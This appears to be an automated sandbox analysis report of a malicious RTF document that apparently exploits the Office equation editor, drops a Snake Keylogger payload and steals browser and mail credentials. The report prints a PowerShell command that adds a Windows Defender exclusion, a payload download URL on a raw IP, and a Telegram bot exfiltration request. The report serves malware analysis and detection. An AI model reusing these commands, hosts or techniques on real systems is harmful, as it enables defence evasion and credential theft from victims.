                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, AxPS6NU4xBdbum4iaG.cs, High entropy of concatenated method names: 'zkoMGWSEEl', 'LjTMwExyud', 'JPtMcQxZFg', 'bBJMUPX7Zd', 'MJvManMn6i', 'ggKMBYaHVB', 'oC9MO0LR2n', 'qrfMTRtiMO', 'ikaMpajYAS', 'bf0M3ZrkS9'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, nkQiD6cY1Ydm4FTjxb.cs, High entropy of concatenated method names: 'rxkIFvcT9X', 'jcOIVUxJu0', 'idVIY6Wpl2', 'DqdItLOrl5', 'RcWI0WnxxT', 'QGaIhjRhOe', 'Q1GIqrwc1I', 'kO8IvBONHe', 'h0wIRvPnHw', 'IcVI6vD7fO'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, oe3Km7DTgTKGBvcC3S.cs, High entropy of concatenated method names: 'Scex7itZ1a', 'krMxIUajhW', 'WAoxlBZMAN', 'hR9xo8OeH8', 'XCoxCvFwtf', 'Rayl0pjCrE', 'R0klhNWoX4', 'H3klqerTNv', 'aC1lv4xu3i', 'MpclR2U3dH'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, A1IKPavVkyxBAQZuM2.cs, High entropy of concatenated method names: 'QagTuhRpIP', 'iuiTIIybAn', 'TUgTMN0CRY', 'M2OTl9QPLY', 's9cTxakbyl', 'ghkTouCgWb', 'TiSTCesadA', 'obUTL5B18F', 'z60Te5t9Vx', 'JNgT9Rykqq'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, SXuFQVPsQB87HiA6dN1.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nhi3FQlC0Z', 'Ihd3VS9Sql', 'eHg3Yg8xVv', 'ASW3tAjk1B', 'tsV30MdOAd', 'pye3hhVSqr', 'QSU3qmPvvb'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, d8ukINn1NQVCqVxQjL.cs, High entropy of concatenated method names: 'CE6l5ByBSK', 'jAmlN6imED', 'VpCMkyL7ec', 'nsCM2pZudQ', 'cU3MEHc6BB', 't2rMiVj1eh', 'RdnMAgDBYp', 'G7mMgwjQOv', 'xWSMbkHlmK', 'Sl3M8gdhbi'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, QRu7lvPHJ4Jfthlhhtx.cs, High entropy of concatenated method names: 'HecpjlAJjF', 'u6OpZKTxUO', 'gb4p4eHqsf', 'WaApGpTln0', 'PLDp5eduKx', 'IJYpwCKTES', 'oN4pNLJKGC', 'OhPpcljpH7', 'iyWpUm8VIA', 'k5Bpn12qEL'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs, High entropy of concatenated method names: 'XVns7YYd64', 'gk9suK4tW4', 'iqosI1Ahmq', 'B34sMTinFP', 'yGnslT6cJu', 'uOesxApms1', 'IQZsoqlBYD', 'ctasCPOlT0', 'arosLC0xTI', 'HHbseOLoCK'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pE7g6sAN1if5hfhCiK.cs, High entropy of concatenated method names: 'bbgouYl8De', 'boxoMRc0sQ', 'wBvoxXtFSR', 'tpRx6PwpOm', 'VRLxzZd62H', 'xlJoHIhLv7', 'iBsoPSrTMV', 'kt1o10RlEx', 'YG1osMXSe3', 'FhSoXQq0hT'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, zcJu9C6JCFbkvaDEP2.cs, High entropy of concatenated method names: 'sBSpPRoUWj', 'v3vpsTJeju', 'FXTpX0rqbk', 'I8wpuhaIk3', 'gUnpI1eyv8', 'BCmplMBKpZ', 'b3lpxlFJUF', 'XsSTqtU29p', 'EvNTv4nvcU', 'rK3TR9xRR2'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, OxVbcfFYjHQZCnPtSc.cs, High entropy of concatenated method names: 'iuya8y4NAd', 'tCDaJsm5Li', 'AjbaFXqHYZ', 'a3CaV7bQXL', 'fnnafbsDW9', 'hMuak9Jqft', 'Bp0a2SMK5p', 'BL1aESxrOe', 'y9Rai4KiyZ', 'yqHaAJUd24'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, Vri5Y0X3Mvj8QeZPU3.cs, High entropy of concatenated method names: 'uLWPokQiD6', 'S1YPCdm4FT', 'C4xPeBdbum', 'ziaP9GX8uk', 'SxQPajLae3', 'Qm7PBTgTKG', 'rnQZCCh0wCxJpXER3h', 'Bi2bHbSHCynpkvrkHt', 'RyLPPat0KD', 'ciZPsa8Tdu'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, ORv0Vf1MXaCwqJj3AO.cs, High entropy of concatenated method names: 'M8a4S0T1A', 'QANG02vIj', 'DTNweXmE7', 'sanNBUiQK', 'sfjUKgcJ8', 'Bl3nr80sk', 'gQQRpnyf80he2jpcWd', 'Qoi4H3nYbSufOefLo2', 'EiETYQF9m', 'Om03b4vCA'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, ay0RdqRtsqlCqsp4Jt.cs, High entropy of concatenated method names: 'WeYTDG5KTM', 'J4QTf4nFNe', 'v4ATksmPf6', 'ki0T2UQ0rc', 'IWHTFiAXji', 'qnITEuCdgs', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, Eg2Qf0Mvy91CloiMEy.cs, High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mY41RK24rR', 'SpG16nV9i8', 'fEW1zpf1lZ', 'hqisHMPsD9', 'cqssPbXsVr', 'YJgs14GO0O', 'OkGss3OiBw', 'XVpyUEY0fKZHIVbygfx'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, IjiV83IwFQ2LWBkWZL.cs, High entropy of concatenated method names: 'Dispose', 'DllPRhQ8dw', 'cFu1fDNHD2', 'ye3vvGqc1V', 'p51P6IKPaV', 'IyxPzBAQZu', 'ProcessDialogKey', 'g2P1Hy0Rdq', 'Tsq1PlCqsp', 'zJt114cJu9'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, FLt5ZqbnRjplMM1mRV.cs, High entropy of concatenated method names: 'OEaoj4p6Ys', 'bUUoZTcS4d', 'INpo4PmK1Y', 'IZ8oGtybay', 'Yrko5E60kT', 'HEwow7kQS8', 'M3moNLIYwP', 'Fojoc4iTc1', 'gsVoUlVwBG', 'Ve7onoapbd'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, w7sfGjhxCOpKI2Hm2M.cs, High entropy of concatenated method names: 'yumOvgZufS', 'o3lO6rQ7uh', 'sbPTHq4fPy', 'vCATPuWb02', 'pIIOrDLKW0', 'snDOJ6U0gr', 'qFqOKk1IkK', 'zsGOF6oJlN', 'g7GOVsWk8B', 'dAoOYvQ1lb'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, bgVh2BzAtL2EuQnmHR.cs, High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pk3pWvnLxy', 'K4HpaiiR66', 'bnlpB8RSqh', 'PwSpOuKLfx', 'HsspThxL0x', 'i7KppA34Mc', 'dslp3ME4CY'

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 2350000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 65B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 75B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 7730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 8730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 8DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 9DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: ADF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 2530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: 360000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2556
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3790
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Window / User API: threadDelayed 9250
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Window / User API: threadDelayed 569
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3276 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3472 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3448 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660 Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3644 Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3688 Thread sleep time: -11990383647911201s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3688 Thread sleep time: -7200000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3692 Thread sleep count: 9250 > 30
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3692 Thread sleep count: 569 > 30
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3784 Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Memory written: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe base: 400000 value starts with: 4D5A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Process created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe Queries volume information: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

                  Remote Access Functionality

                  Source: Yara match File source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 14 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Install Root Certificate | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Email Collection | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Process Discovery | SSH | 1 Input Capture | 24 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Modify Registry | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 31 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 111 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph
ID: 1545180, Sample: na.doc, Startdate: 30/10/2024, Architecture: WINDOWS, Score: 100

Sample-level signatures: Initial sample is an obfuscated RTF file; Suricata IDS alerts for network traffic; Found malware configuration; 24 other signatures.

• WINWORD.EXE started. Dropped: C:\Users\user\Desktop\~$na.doc (data). Started: EQNEDT32.EXE (two instances).
• EQNEDT32.EXE started. DNS/IP: 87.120.84.38, 49161, 80, SHARCOM-ASBG, Bulgaria. Dropped: C:\Users\user\...\cdlpohayugo39567.exe (PE32), C:\Users\user\...\qHbynE8Vgwabsy3[1].exe (PE32). Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802). Started: cdlpohayugo39567.exe.
• cdlpohayugo39567.exe started. Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes. Started: cdlpohayugo39567.exe, powershell.exe.
• cdlpohayugo39567.exe (injected child) started. DNS/IP: reallyfreegeoip.org, api.telegram.org, 9 other IPs or domains. Signatures: Installs new ROOT certificates; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).
• reallyfreegeoip.org. Signature: Tries to detect the country of the analysis system (by using the IP).
• api.telegram.org. Signature: Uses the Telegram API (likely for C&C communication).

Source | Detection | Scanner | Label | Link
na.doc | 45% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
na.doc | 100% | Avira | HEUR/Rtf.Malformed |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe | 67% | ReversingLabs | Win32.Spyware.Snakekeylogger |
C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe | 67% | ReversingLabs | Win32.Spyware.Snakekeylogger |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
http://checkip.dyndns.org/q | 0% | URL Reputation | safe |
http://reallyfreegeoip.org | 0% | URL Reputation | safe |
http://checkip.dyndns.com | 0% | URL Reputation | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://checkip.dyndns.org | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://reallyfreegeoip.org | 0% | URL Reputation | safe |
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 132.226.8.169 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/173.254.250.78 | false | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
http://87.120.84.38/txt/qHbynE8Vgwabsy3.exe | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                  • URL Reputation: safe
                                                                                  unknown
